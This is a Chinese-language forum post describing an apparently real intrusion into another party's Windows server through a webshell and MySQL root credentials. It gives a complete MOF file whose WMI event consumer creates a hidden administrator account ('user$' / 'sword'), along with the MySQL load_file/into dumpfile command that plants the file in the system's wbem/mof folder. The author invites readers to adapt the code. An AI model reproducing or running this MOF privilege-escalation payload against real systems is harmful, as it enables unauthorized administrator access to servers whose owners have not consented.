首先呢先谢谢米爷在我弄这个的时候把我骂开窍了- -。
不多说了~。~像名称一样哈~
首先呢是朋友扔我一shell
他提权差就给咱了,简单的看了下,是php脚本的,一看php脚本就肯定带有,mysql。
就在网站目录看了下data文件夹习惯性的~
运气不错。Root。
居然知道是这东西,上大马。(不知道利用菜刀)
OK回显成功。
5.0.67不用说都知道是什么了,这版本基本上udf都可以秒的,但毕竟这里说的是mof所以就用mof提吧。
先找个可写路径。
C盘可以,运气不错。
然后在上传路径传个我们的mof文件
代码如下:
#pragmanamespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as$Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exenet user user$ sword /add & net localgroup administrators user$ /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
生成的账号:user$ 密码为:sword
这段代码可自行修改。
接着呢执行命令:selectload_file('C:\\RECYCLER\\xx.mof') into dumpfile 'c:/windows/system32/wbem/mof/xx.mof';
OK.。执行命令完成。
由于权限设置无法直接查询管理员。登陆下就知道了。
好了mof提权就这样。
谢谢观看。
Ps:由于当时提的时候截的几张图,后来管理员把mof的漏洞修复了。所以服务器没了。就这样~
254
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
